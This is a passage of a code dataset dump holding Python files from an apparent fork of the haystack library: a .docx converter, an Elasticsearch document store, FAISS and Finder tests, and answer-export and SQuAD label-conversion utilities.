"text": "from haystack.indexing.file_converters.base import BaseConverter\nimport logging\nfrom pathlib import Path\nfrom typing import List, Dict, Optional, Any, Tuple\nimport docx\n\nlogger = logging.getLogger(__name__)\n\n\nclass DocxToTextConverter(BaseConverter):\n def extract_pages(self, file_path: Path) -> Tuple[List[str], Optional[Dict[str, Any]]]:\n \"\"\"\n Extract text from a .docx file.\n Note: As docx doesn't contain \"page\" information, we actually extract and return a list of paragraphs here.\n For compliance with other converters we nevertheless opted for keeping the methods name.\n\n :param file_path: Path to the .docx file you want to convert\n \"\"\"\n\n #TODO We might want to join small passages here (e.g. titles)\n #TODO Investigate if there's a workaround to extract on a page level rather than passage level\n # (e.g. in the test sample it seemed that page breaks resulted in a paragraphs with only a \"\\n\"\n\n doc = docx.Document(file_path) # Creating word reader object.\n fullText = []\n for para in doc.paragraphs:\n if para.text.strip() != \"\":\n fullText.append(para.text)\n return fullText, None\n"
},
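A short usage sketch for the converter above, assuming the base converter needs no constructor arguments; the sample path is illustrative:

from pathlib import Path
from haystack.indexing.file_converters.docx import DocxToTextConverter

converter = DocxToTextConverter()
# extract_pages() returns the non-empty paragraphs plus a (here unused) meta dict
paragraphs, _ = converter.extract_pages(file_path=Path("samples/docx/sample.docx"))
print(len(paragraphs), paragraphs[0][:80])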
{
"alpha_fraction": 0.5611247420310974,
"alphanum_fraction": 0.5629162192344666,
"avg_line_length": 45.67454528808594,
"blob_id": "dd9fbd5d825eb2cdaa56c02c6bd1c9d8c976f5b8",
"content_id": "4526ca4d862d46db00f73510537dc5eb53d161f5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25677,
"license_type": "permissive",
"max_line_length": 233,
"num_lines": 550,
"path": "/haystack/database/elasticsearch.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\nimport time\nimport datetime\nfrom string import Template\nfrom typing import List, Optional, Union, Dict, Any\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import bulk, scan\nimport numpy as np\n\nfrom haystack.database.base import BaseDocumentStore, Document, Label\nfrom haystack.indexing.utils import eval_data_from_file\nfrom haystack.retriever.base import BaseRetriever\n\nlogger = logging.getLogger(__name__)\n\n\nclass ElasticsearchDocumentStore(BaseDocumentStore):\n def __init__(\n self,\n host: str = \"localhost\",\n port: int = 9200,\n username: str = \"\",\n password: str = \"\",\n index: str = \"document\",\n label_index: str = \"label\",\n search_fields: Union[str, list] = \"text\",\n text_field: str = \"text\",\n name_field: str = \"name\",\n embedding_field: str = \"embedding\",\n embedding_dim: int = 768,\n custom_mapping: Optional[dict] = None,\n excluded_meta_data: Optional[list] = None,\n faq_question_field: Optional[str] = None,\n scheme: str = \"http\",\n ca_certs: bool = False,\n verify_certs: bool = True,\n create_index: bool = True,\n update_existing_documents: bool = False,\n refresh_type: str = \"wait_for\",\n request_timeout: int = 10,\n similarity_function: str = \"cosineSimilarity\",\n maxsize: int = 10,\n ):\n \"\"\"\n A DocumentStore using Elasticsearch to store and query the documents for our search.\n\n * Keeps all the logic to store and query documents from Elastic, incl. mapping of fields, adding filters or boosts to your queries, and storing embeddings\n * You can either use an existing Elasticsearch index or create a new one via haystack\n * Retrievers operate on top of this DocumentStore to find the relevant documents for a query\n\n :param host: url of elasticsearch\n :param port: port of elasticsearch\n :param username: username\n :param password: password\n :param index: Name of index in elasticsearch to use. If not existing yet, we will create one.\n :param search_fields: Name of fields used by ElasticsearchRetriever to find matches in the docs to our incoming query (using elastic's multi_match query), e.g. [\"title\", \"full_text\"]\n :param text_field: Name of field that might contain the answer and will therefore be passed to the Reader Model (e.g. \"full_text\").\n If no Reader is used (e.g. in FAQ-Style QA) the plain content of this field will just be returned.\n :param name_field: Name of field that contains the title of the the doc\n :param embedding_field: Name of field containing an embedding vector (Only needed when using a dense retriever (e.g. DensePassageRetriever, EmbeddingRetriever) on top)\n :param embedding_dim: Dimensionality of embedding vector (Only needed when using a dense retriever (e.g. DensePassageRetriever, EmbeddingRetriever) on top)\n :param custom_mapping: If you want to use your own custom mapping for creating a new index in Elasticsearch, you can supply it here as a dictionary.\n :param excluded_meta_data: Name of fields in Elasticsearch that should not be returned (e.g. [field_one, field_two]).\n Helpful if you have fields with long, irrelevant content that you don't want to display in results (e.g. 
embedding vectors).\n :param scheme: 'https' or 'http', protocol used to connect to your elasticsearch instance\n :param ca_certs: Root certificates for SSL\n :param verify_certs: Whether to be strict about ca certificates\n :param create_index: Whether to try creating a new index (If the index of that name is already existing, we will just continue in any case)\n :param update_existing_documents: Whether to update any existing documents with the same ID when adding\n documents. When set as True, any document with an existing ID gets updated.\n If set to False, an error is raised if the document ID of the document being\n added already exists.\n :param refresh_type: Type of ES refresh used to control when changes made by a request (e.g. bulk) are made visible to search.\n Values:\n - 'wait_for' => continue only after changes are visible (slow, but safe)\n - 'false' => continue directly (fast, but sometimes unintuitive behaviour when docs are not immediately available after indexing)\n More info at https://www.elastic.co/guide/en/elasticsearch/reference/6.8/docs-refresh.html\n :param request_timeout: Elasticsearch client timeout\n :param similarity_function: Similarity function used to compute score between two vectors.\n Values:\n - 'cosineSimilarity'\n - 'dotProduct'\n :param maxsize: number of connections to each node\n More info at https://elasticsearch-py.readthedocs.io/en/master/#thread-safety\n \n \"\"\"\n self.client = Elasticsearch(hosts=[{\"host\": host, \"port\": port}], http_auth=(username, password),\n scheme=scheme, ca_certs=ca_certs, verify_certs=verify_certs, maxsize=maxsize)\n\n # configure mappings to ES fields that will be used for querying / displaying results\n if type(search_fields) == str:\n search_fields = [search_fields]\n\n #TODO we should implement a more flexible interal mapping here that simplifies the usage of additional,\n # custom fields (e.g. meta data you want to return)\n self.search_fields = search_fields\n self.text_field = text_field\n self.name_field = name_field\n self.embedding_field = embedding_field\n self.embedding_dim = embedding_dim\n self.excluded_meta_data = excluded_meta_data\n self.faq_question_field = faq_question_field\n\n self.custom_mapping = custom_mapping\n if create_index:\n self._create_document_index(index)\n self.index: str = index\n\n self._create_label_index(label_index)\n self.label_index: str = label_index\n self.update_existing_documents = update_existing_documents\n self.refresh_type = refresh_type\n self.request_timeout = request_timeout\n self.similarity_function = similarity_function\n self.offset_for_positive_dot_product=0 #Set from outside if needed (almost useless). 
Other info at https://www.elastic.co/guide/en/elasticsearch/reference/master/query-dsl-script-score-query.html#script-score-top-level-params\n \n def _create_document_index(self, index_name):\n if self.client.indices.exists(index=index_name):\n return\n\n if self.custom_mapping:\n mapping = self.custom_mapping\n else:\n mapping = {\n \"mappings\": {\n \"properties\": {\n self.name_field: {\"type\": \"keyword\"},\n self.text_field: {\"type\": \"text\"},\n },\n \"dynamic_templates\": [\n {\n \"strings\": {\n \"path_match\": \"*\",\n \"match_mapping_type\": \"string\",\n \"mapping\": {\"type\": \"keyword\"}}}\n ],\n }\n }\n if self.embedding_field:\n mapping[\"mappings\"][\"properties\"][self.embedding_field] = {\"type\": \"dense_vector\", \"dims\": self.embedding_dim}\n self.client.indices.create(index=index_name, body=mapping)\n\n def _create_label_index(self, index_name):\n if self.client.indices.exists(index=index_name):\n return\n mapping = {\n \"mappings\": {\n \"properties\": {\n \"question\": {\"type\": \"text\"},\n \"answer\": {\"type\": \"text\"},\n \"is_correct_answer\": {\"type\": \"boolean\"},\n \"is_correct_document\": {\"type\": \"boolean\"},\n \"origin\": {\"type\": \"keyword\"},\n \"document_id\": {\"type\": \"keyword\"},\n \"offset_start_in_doc\": {\"type\": \"long\"},\n \"no_answer\": {\"type\": \"boolean\"},\n \"model_id\": {\"type\": \"keyword\"},\n \"type\": {\"type\": \"keyword\"},\n }\n }\n }\n self.client.indices.create(index=index_name, body=mapping)\n\n # TODO: Add flexibility to define other non-meta and meta fields expected by the Document class\n def _create_document_field_map(self) -> Dict:\n return {\n self.text_field: \"text\",\n self.embedding_field: \"embedding\",\n self.faq_question_field if self.faq_question_field else \"question\": \"question\"\n }\n\n def get_document_by_id(self, id: str, index=None) -> Optional[Document]:\n index = index or self.index\n documents = self.get_documents_by_id([id], index=index)\n if documents:\n return documents[0]\n else:\n return None\n\n def get_documents_by_id(self, ids: List[str], index=None) -> List[Document]:\n index = index or self.index\n query = {\"query\": {\"ids\": {\"values\": ids}}}\n result = self.client.search(index=index, body=query)[\"hits\"][\"hits\"]\n documents = [self._convert_es_hit_to_document(hit) for hit in result]\n return documents\n\n def write_documents(self, documents: Union[List[dict], List[Document]], index: Optional[str] = None):\n \"\"\"\n Indexes documents for later queries in Elasticsearch.\n\n When using explicit document IDs, any existing document with the same ID gets updated.\n\n :param documents: a list of Python dictionaries or a list of Haystack Document objects.\n For documents as dictionaries, the format is {\"text\": \"<the-actual-text>\"}.\n Optionally: Include meta data via {\"text\": \"<the-actual-text>\",\n \"meta\":{\"name\": \"<some-document-name>, \"author\": \"somebody\", ...}}\n It can be used for filtering and is accessible in the responses of the Finder.\n Advanced: If you are using your own Elasticsearch mapping, the key names in the dictionary\n should be changed to what you have set for self.text_field and self.name_field.\n :param index: Elasticsearch index where the documents should be indexed. 
If not supplied, self.index will be used.\n :return: None\n \"\"\"\n\n if index and not self.client.indices.exists(index=index):\n self._create_document_index(index)\n\n if index is None:\n index = self.index\n\n # Make sure we comply to Document class format\n documents_objects = [Document.from_dict(d, field_map=self._create_document_field_map())\n if isinstance(d, dict) else d for d in documents]\n\n documents_to_index = []\n for doc in documents_objects:\n\n _doc = {\n \"_op_type\": \"index\" if self.update_existing_documents else \"create\",\n \"_index\": index,\n **doc.to_dict(field_map=self._create_document_field_map())\n } # type: Dict[str, Any]\n\n # rename id for elastic\n _doc[\"_id\"] = str(_doc.pop(\"id\"))\n\n # don't index query score and empty fields\n _ = _doc.pop(\"query_score\", None)\n _doc = {k:v for k,v in _doc.items() if v is not None}\n\n # In order to have a flat structure in elastic + similar behaviour to the other DocumentStores,\n # we \"unnest\" all value within \"meta\"\n if \"meta\" in _doc.keys():\n for k, v in _doc[\"meta\"].items():\n _doc[k] = v\n _doc.pop(\"meta\")\n documents_to_index.append(_doc)\n bulk(self.client, documents_to_index, request_timeout=self.request_timeout, refresh=self.refresh_type)\n\n def write_labels(self, labels: Union[List[Label], List[dict]], index: Optional[str] = None):\n index = index or self.label_index\n if index and not self.client.indices.exists(index=index):\n self._create_label_index(index)\n\n # Make sure we comply to Label class format\n label_objects = [Label.from_dict(l) if isinstance(l, dict) else l for l in labels]\n\n labels_to_index = []\n for label in label_objects:\n _label = {\n \"_op_type\": \"index\" if self.update_existing_documents else \"create\",\n \"_index\": index,\n **label.to_dict()\n } # type: Dict[str, Any]\n\n labels_to_index.append(_label)\n bulk(self.client, labels_to_index, request_timeout=self.request_timeout, refresh=self.refresh_type)\n\n def update_document_meta(self, id: str, meta: Dict[str, str]):\n body = {\"doc\": meta}\n self.client.update(index=self.index, doc_type=\"_doc\", id=id, body=body, refresh=self.refresh_type)\n\n def get_document_count(self, index: Optional[str] = None) -> int:\n if index is None:\n index = self.index\n result = self.client.count(index=index)\n count = result[\"count\"]\n return count\n\n def get_label_count(self, index: Optional[str] = None) -> int:\n return self.get_document_count(index=index)\n\n def get_all_documents(self, index: Optional[str] = None, filters: Optional[Dict[str, List[str]]] = None) -> List[Document]:\n if index is None:\n index = self.index\n\n result = self.get_all_documents_in_index(index=index, filters=filters)\n documents = [self._convert_es_hit_to_document(hit) for hit in result]\n\n return documents\n\n def get_all_labels(self, index: Optional[str] = None, filters: Optional[Dict[str, List[str]]] = None) -> List[Label]:\n index = index or self.label_index\n result = self.get_all_documents_in_index(index=index, filters=filters)\n labels = [Label.from_dict(hit[\"_source\"]) for hit in result]\n return labels\n\n def get_all_documents_in_index(self, index: str, filters: Optional[dict] = None) -> List[dict]:\n body = {\n \"query\": {\n \"bool\": {\n }\n }\n } # type: Dict[str, Any]\n if filters:\n filter_clause = []\n for key, values in filters.items():\n filter_clause.append(\n {\n \"range\": {key: values}\n }\n )\n body[\"query\"][\"bool\"][\"filter\"] = filter_clause\n else:\n body[\"query\"][\"bool\"][\"must\"] = {\"match_all\": 
{}}\n result = scan(self.client, query=body, index=index)\n\n return result\n\n def query(\n self,\n query: Optional[str],\n filters: Optional[Dict[str, List[str]]] = None,\n top_k: int = 10,\n custom_query: Optional[str] = None,\n index: Optional[str] = None,\n ) -> List[Document]:\n\n if index is None:\n index = self.index\n\n # Naive retrieval without BM25, only filtering\n if query is None:\n body = {\"query\":\n {\"bool\": {\"must\":\n {\"match_all\": {}}}}} # type: Dict[str, Any]\n if filters:\n filter_clause = []\n for key, values in filters.items():\n filter_clause.append(\n {\n \"terms\": {key: values}\n }\n )\n body[\"query\"][\"bool\"][\"filter\"] = filter_clause\n\n # Retrieval via custom query\n elif custom_query: # substitute placeholder for question and filters for the custom_query template string\n template = Template(custom_query)\n # replace all \"${question}\" placeholder(s) with query\n substitutions = {\"question\": query}\n # For each filter we got passed, we'll try to find & replace the corresponding placeholder in the template\n # Example: filters={\"years\":[2018]} => replaces {$years} in custom_query with '[2018]'\n if filters:\n for key, values in filters.items():\n values_str = json.dumps(values)\n substitutions[key] = values_str\n custom_query_json = template.substitute(**substitutions)\n body = json.loads(custom_query_json)\n # add top_k\n body[\"size\"] = str(top_k)\n\n # Default Retrieval via BM25 using the user query on `self.search_fields`\n else:\n body = {\n \"size\": str(top_k),\n \"query\": {\n \"bool\": {\n \"should\": [{\"multi_match\": {\"query\": query, \"type\": \"most_fields\", \"fields\": self.search_fields}}]\n }\n },\n }\n\n if filters:\n filter_clause = []\n for key, values in filters.items():\n if type(values) != list:\n raise ValueError(f'Wrong filter format for key \"{key}\": Please provide a list of allowed values for each key. '\n 'Example: {\"name\": [\"some\", \"more\"], \"category\": [\"only_one\"]} ')\n filter_clause.append(\n {\n \"terms\": {key: values}\n }\n )\n body[\"query\"][\"bool\"][\"filter\"] = filter_clause\n\n if self.excluded_meta_data:\n body[\"_source\"] = {\"excludes\": self.excluded_meta_data}\n\n logger.debug(f\"Retriever query: {body}\")\n result = self.client.search(index=index, body=body)[\"hits\"][\"hits\"]\n\n documents = [self._convert_es_hit_to_document(hit) for hit in result]\n return documents\n\n def query_by_embedding(self,\n query_emb: np.array,\n filters: Optional[Dict[str, List[str]]] = None,\n top_k: int = 10,\n index: Optional[str] = None) -> List[Document]:\n if index is None:\n index = self.index\n\n if not self.embedding_field:\n raise RuntimeError(\"Please specify arg `embedding_field` in ElasticsearchDocumentStore()\")\n else:\n if self.similarity_function == \"cosineSimilarity\":\n source=f\"cosineSimilarity(params.query_vector,'{self.embedding_field}') + 1.0\" # +1 in cosine similarity to avoid negative numbers\n else: #i.e. 
self.similarity_function == \"dotProduct\"\n source=f\"dotProduct(params.query_vector,'{self.embedding_field}')+{self.offset_for_positive_dot_product}\"\n body= {\n \"size\": top_k,\n \"query\": {\n \"script_score\": {\n \"query\": {\"match_all\": {}},\n \"script\": {\n \"source\": source,\n \"params\": {\n \"query_vector\": query_emb.tolist()\n }\n }\n }\n }\n } # type: Dict[str,Any]\n\n if filters:\n for key, values in filters.items():\n if type(values) != list:\n raise ValueError(f'Wrong filter format for key \"{key}\": Please provide a list of allowed values for each key. '\n 'Example: {\"name\": [\"some\", \"more\"], \"category\": [\"only_one\"]} ')\n body[\"query\"][\"script_score\"][\"query\"] = {\"terms\": filters}\n\n if self.excluded_meta_data:\n body[\"_source\"] = {\"excludes\": self.excluded_meta_data}\n\n logger.debug(f\"Retriever query: {body}\")\n result = self.client.search(index=index, body=body, request_timeout=self.request_timeout)[\"hits\"][\"hits\"]\n\n documents = [self._convert_es_hit_to_document(hit, score_adjustment=-1) for hit in result]\n return documents\n\n def _convert_es_hit_to_document(self, hit: dict, score_adjustment: int = 0) -> Document:\n # We put all additional data of the doc into meta_data and return it in the API\n meta_data = {k:v for k,v in hit[\"_source\"].items() if k not in (self.text_field, self.faq_question_field, self.embedding_field)}\n name = meta_data.pop(self.name_field, None)\n if name:\n meta_data[\"name\"] = name\n\n document = Document(\n id=hit[\"_id\"],\n text=hit[\"_source\"].get(self.text_field),\n meta=meta_data,\n query_score=hit[\"_score\"] + score_adjustment if hit[\"_score\"] else None,\n question=hit[\"_source\"].get(self.faq_question_field),\n embedding=hit[\"_source\"].get(self.embedding_field)\n )\n return document\n\n def describe_documents(self, index=None):\n if index is None:\n index = self.index\n docs = self.get_all_documents(index)\n\n l = [len(d.text) for d in docs]\n stats = {\"count\": len(docs),\n \"chars_mean\": np.mean(l),\n \"chars_max\": max(l),\n \"chars_min\": min(l),\n \"chars_median\": np.median(l),\n }\n return stats\n\n\n\n def compute_and_store_embeddings(self, retriever, index, docs):\n logger.info(f\"Updating embeddings for {len(docs)} docs ...\")\n embeddings = retriever.embed_passages(docs)\n\n assert len(docs) == len(embeddings)\n\n if embeddings[0].shape[0] != self.embedding_dim:\n raise RuntimeError(f\"Embedding dim. of model ({embeddings[0].shape[0]})\"\n f\" doesn't match embedding dim. in documentstore ({self.embedding_dim}).\"\n \"Specify the arg `embedding_dim` when initializing ElasticsearchDocumentStore()\")\n doc_updates = []\n for doc, emb in zip(docs, embeddings):\n update = {\"_op_type\": \"update\",\n \"_index\": index,\n \"_id\": doc.id,\n \"doc\": {self.embedding_field: emb.tolist()},\n }\n doc_updates.append(update)\n\n bulk(self.client, doc_updates, request_timeout=self.request_timeout,refresh=self.refresh_type)\n\n\n def update_embeddings(self, retriever: BaseRetriever, index: Optional[str] = None, num_batches: Optional[int] = None, batch_size: Optional[int] = None, first_batch: Optional[int] = None):\n \"\"\"\n Updates the embeddings in the the document store using the encoding model specified in the retriever.\n This can be useful if want to add or change the embeddings for your documents (e.g. 
after changing the retriever config).\n\n :param retriever: Retriever\n :param index\n :param num_batches\n :param batch_size\n :param first_batch\n :return: None\n \"\"\"\n if index is None:\n index = self.index\n\n if not self.embedding_field:\n raise RuntimeError(\"Specify the arg `embedding_field` when initializing ElasticsearchDocumentStore()\")\n\n if num_batches: #batch processing\n if not(first_batch) or first_batch<0:\n first_batch=0 #start from the beginning\n for batch_to_execute in range(first_batch,num_batches):\n logger.info(f\"Batch {batch_to_execute}: Start at {datetime.datetime.now().strftime('%d/%m/%Y %H:%M:%S')}\")\n\n start_ID_doc=batch_to_execute*batch_size\n end_ID_doc=start_ID_doc+batch_size\n range_query_dict={\n 'myIntID': {\n \"gte\": start_ID_doc,\n \"lt\": end_ID_doc\n }\n }\n batch_docs = self.get_all_documents(index,filters=range_query_dict)\n self.compute_and_store_embeddings(retriever,index,batch_docs)\n else: #one single batch for all documents\n docs = self.get_all_documents(index)\n self.compute_and_store_embeddings(retriever,index,docs)\n\n def add_eval_data(self, filename: str, doc_index: str = \"eval_document\", label_index: str = \"label\"):\n \"\"\"\n Adds a SQuAD-formatted file to the DocumentStore in order to be able to perform evaluation on it.\n\n :param filename: Name of the file containing evaluation data\n :type filename: str\n :param doc_index: Elasticsearch index where evaluation documents should be stored\n :type doc_index: str\n :param label_index: Elasticsearch index where labeled questions should be stored\n :type label_index: str\n \"\"\"\n\n docs, labels = eval_data_from_file(filename)\n self.write_documents(docs, index=doc_index)\n self.write_labels(labels, index=label_index)\n\n def delete_all_documents(self, index: str):\n \"\"\"\n Delete all documents in an index.\n\n :param index: index name\n :return: None\n \"\"\"\n self.client.delete_by_query(index=index, body={\"query\": {\"match_all\": {}}}, ignore=[404])\n # We want to be sure that all docs are deleted before continuing (delete_by_query doesn't support wait_for)\n time.sleep(1)\n\n\n\n\n\n\n"
},
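A sketch of the custom_query templating described in the query() docstring above: ${question} and one placeholder per filter key are substituted (filter values via json.dumps) before the body is sent to Elasticsearch. `document_store` is assumed to be an ElasticsearchDocumentStore; the field and filter names are illustrative:

custom_query = """{
    "query": {
        "bool": {
            "must": {"match": {"text": "${question}"}},
            "filter": [{"terms": {"year": ${year}}}]
        }
    }
}"""

# ${question} -> the query string, ${year} -> '["2019", "2020"]'; "size" is set from top_k
docs = document_store.query(query="Why did revenue grow?",
                            filters={"year": ["2019", "2020"]},
                            custom_query=custom_query,
                            top_k=10)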
{
"alpha_fraction": 0.6494845151901245,
"alphanum_fraction": 0.6691659092903137,
"avg_line_length": 37.14285659790039,
"blob_id": "6681f9da30ca99db37af6b855ea3ea89719a5fb9",
"content_id": "0b5796f278992a9fecf3d53ab50a3fb875b6c3d5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1067,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 28,
"path": "/test/test_faiss.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pytest\n\n\[email protected](\"document_store\", [\"faiss\"], indirect=True)\ndef test_faiss_indexing(document_store):\n documents = [\n {\"name\": \"name_1\", \"text\": \"text_1\", \"embedding\": np.random.rand(768).astype(np.float32)},\n {\"name\": \"name_2\", \"text\": \"text_2\", \"embedding\": np.random.rand(768).astype(np.float32)},\n {\"name\": \"name_3\", \"text\": \"text_3\", \"embedding\": np.random.rand(768).astype(np.float32)},\n ]\n\n document_store.write_documents(documents)\n documents_indexed = document_store.get_all_documents()\n\n # test if correct vector_ids are assigned\n for i, doc in enumerate(documents_indexed):\n assert doc.meta[\"vector_id\"] == str(i)\n\n # test insertion of documents in an existing index fails\n with pytest.raises(Exception):\n document_store.write_documents(documents)\n\n # test saving the index\n document_store.save(\"haystack_test_faiss\")\n\n # test loading the index\n document_store.load(sql_url=\"sqlite:///haystack_test.db\", faiss_file_path=\"haystack_test_faiss\")"
},
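A persistence sketch mirroring the FAISS test above; only write_documents(), save(), and load() appear verbatim in the test, while the constructor argument is an assumption:

import numpy as np
from haystack.database.faiss import FAISSDocumentStore

document_store = FAISSDocumentStore(sql_url="sqlite:///haystack_test.db")  # assumed signature
document_store.write_documents([
    {"name": "doc_1", "text": "some text", "embedding": np.random.rand(768).astype(np.float32)},
])

document_store.save("haystack_test_faiss")  # persist the FAISS index to disk
document_store.load(sql_url="sqlite:///haystack_test.db", faiss_file_path="haystack_test_faiss")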
{
"alpha_fraction": 0.6497145891189575,
"alphanum_fraction": 0.6642449498176575,
"avg_line_length": 44.78571319580078,
"blob_id": "835ff757652b51f90ab60690ca58435d6e4efed4",
"content_id": "e7a11eb595428947a501301bd5feca28df0c3e9f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1927,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 42,
"path": "/test/test_finder.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from haystack import Finder\nfrom haystack.retriever.sparse import TfidfRetriever\nimport pytest\n\n\ndef test_finder_get_answers(reader, document_store_with_docs):\n retriever = TfidfRetriever(document_store=document_store_with_docs)\n finder = Finder(reader, retriever)\n prediction = finder.get_answers(question=\"Who lives in Berlin?\", top_k_retriever=10,\n top_k_reader=3)\n assert prediction is not None\n assert prediction[\"question\"] == \"Who lives in Berlin?\"\n assert prediction[\"answers\"][0][\"answer\"] == \"Carla\"\n assert prediction[\"answers\"][0][\"probability\"] <= 1\n assert prediction[\"answers\"][0][\"probability\"] >= 0\n assert prediction[\"answers\"][0][\"meta\"][\"meta_field\"] == \"test1\"\n assert prediction[\"answers\"][0][\"context\"] == \"My name is Carla and I live in Berlin\"\n\n assert len(prediction[\"answers\"]) == 3\n\n\ndef test_finder_offsets(reader, document_store_with_docs):\n retriever = TfidfRetriever(document_store=document_store_with_docs)\n finder = Finder(reader, retriever)\n prediction = finder.get_answers(question=\"Who lives in Berlin?\", top_k_retriever=10,\n top_k_reader=5)\n\n assert prediction[\"answers\"][0][\"offset_start\"] == 11\n assert prediction[\"answers\"][0][\"offset_end\"] == 16\n start = prediction[\"answers\"][0][\"offset_start\"]\n end = prediction[\"answers\"][0][\"offset_end\"]\n assert prediction[\"answers\"][0][\"context\"][start:end] == prediction[\"answers\"][0][\"answer\"]\n\n\ndef test_finder_get_answers_single_result(reader, document_store_with_docs):\n retriever = TfidfRetriever(document_store=document_store_with_docs)\n finder = Finder(reader, retriever)\n query = \"testing finder\"\n prediction = finder.get_answers(question=query, top_k_retriever=1,\n top_k_reader=1)\n assert prediction is not None\n assert len(prediction[\"answers\"]) == 1\n\n\n\n\n"
},
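A minimal question-answering sketch using the Finder API exercised above; `document_store` stands for any DocumentStore instance, and the reader checkpoint and FARMReader import path are assumptions:

from haystack import Finder
from haystack.reader.farm import FARMReader
from haystack.retriever.sparse import TfidfRetriever

document_store.write_documents([{"text": "My name is Carla and I live in Berlin",
                                 "meta": {"name": "doc_1"}}])
retriever = TfidfRetriever(document_store=document_store)
reader = FARMReader(model_name_or_path="deepset/roberta-base-squad2")
finder = Finder(reader, retriever)

prediction = finder.get_answers(question="Who lives in Berlin?",
                                top_k_retriever=10, top_k_reader=3)
print(prediction["answers"][0]["answer"])  # expected: "Carla"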
{
"alpha_fraction": 0.5522751808166504,
"alphanum_fraction": 0.5539003014564514,
"avg_line_length": 31.104347229003906,
"blob_id": "095b3e2b01808d2d32adc3e12de01a99432231f7",
"content_id": "2f19e04d40ea86e480110d1eb0cf6a4c0af167bf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3692,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 115,
"path": "/haystack/utils.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import json\nfrom collections import defaultdict\nimport logging\nimport pprint\nimport pandas as pd\nfrom typing import Dict, Any, List\nfrom haystack.database.sql import DocumentORM\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef print_answers(results: dict, details: str = \"all\"):\n answers = results[\"answers\"]\n pp = pprint.PrettyPrinter(indent=4)\n if details != \"all\":\n if details == \"minimal\":\n keys_to_keep = set([\"answer\", \"context\"])\n elif details == \"medium\":\n keys_to_keep = set([\"answer\", \"context\", \"score\"])\n else:\n keys_to_keep = answers.keys()\n\n # filter the results\n filtered_answers = []\n for ans in answers:\n filtered_answers.append({k: ans[k] for k in keys_to_keep})\n pp.pprint(filtered_answers)\n else:\n pp.pprint(results)\n\n\ndef export_answers_to_csv(agg_results: list, output_file):\n \"\"\"\n Exports answers coming from finder.get_answers() to a CSV file\n :param agg_results: list of predictions coming from finder.get_answers()\n :param output_file: filename of output file\n :return: None\n \"\"\"\n if isinstance(agg_results, dict):\n agg_results = [agg_results]\n\n assert \"question\" in agg_results[0], f\"Wrong format used for {agg_results[0]}\"\n assert \"answers\" in agg_results[0], f\"Wrong format used for {agg_results[0]}\"\n\n data = {} # type: Dict[str, List[Any]]\n data[\"question\"] = []\n data[\"prediction\"] = []\n data[\"prediction_rank\"] = []\n data[\"prediction_context\"] = []\n\n for res in agg_results:\n for i in range(len(res[\"answers\"])):\n temp = res[\"answers\"][i]\n data[\"question\"].append(res[\"question\"])\n data[\"prediction\"].append(temp[\"answer\"])\n data[\"prediction_rank\"].append(i + 1)\n data[\"prediction_context\"].append(temp[\"context\"])\n\n df = pd.DataFrame(data)\n df.to_csv(output_file, index=False)\n\n\n\ndef convert_labels_to_squad(labels_file: str):\n \"\"\"\n Convert the export from the labeling UI to SQuAD format for training.\n\n :param labels_file: path for export file from the labeling tool\n :return:\n \"\"\"\n with open(labels_file) as label_file:\n labels = json.load(label_file)\n\n labels_grouped_by_documents = defaultdict(list)\n for label in labels:\n labels_grouped_by_documents[label[\"document_id\"]].append(label)\n\n labels_in_squad_format = {\"data\": []} # type: Dict[str, Any]\n for document_id, labels in labels_grouped_by_documents.items():\n qas = []\n for label in labels:\n doc = DocumentORM.query.get(label[\"document_id\"])\n\n assert (\n doc.text[label[\"start_offset\"] : label[\"end_offset\"]]\n == label[\"selected_text\"]\n )\n\n qas.append(\n {\n \"question\": label[\"question\"],\n \"id\": label[\"id\"],\n \"question_id\": label[\"question_id\"],\n \"answers\": [\n {\n \"text\": label[\"selected_text\"],\n \"answer_start\": label[\"start_offset\"],\n \"labeller_id\": label[\"labeler_id\"],\n }\n ],\n \"is_impossible\": False,\n }\n )\n\n squad_format_label = {\n \"paragraphs\": [\n {\"qas\": qas, \"context\": doc.text, \"document_id\": document_id}\n ]\n }\n\n labels_in_squad_format[\"data\"].append(squad_format_label)\n\n with open(\"labels_in_squad_format.json\", \"w+\") as outfile:\n json.dump(labels_in_squad_format, outfile)\n"
},
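Brief usage of the two helpers in the record above, assuming `prediction` is a dict returned by finder.get_answers():

from haystack.utils import export_answers_to_csv, print_answers

print_answers(prediction, details="minimal")  # keeps only "answer" and "context" per answer
export_answers_to_csv([prediction], output_file="answers.csv")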
{
"alpha_fraction": 0.6068922877311707,
"alphanum_fraction": 0.6207181215286255,
"avg_line_length": 36.859375,
"blob_id": "e4d5d2d9abc135edf1a79479ef1b436770a3b253",
"content_id": "12689fff9418152ded3cdcaed25a735c1901e08b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9692,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 256,
"path": "/test/test_db.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
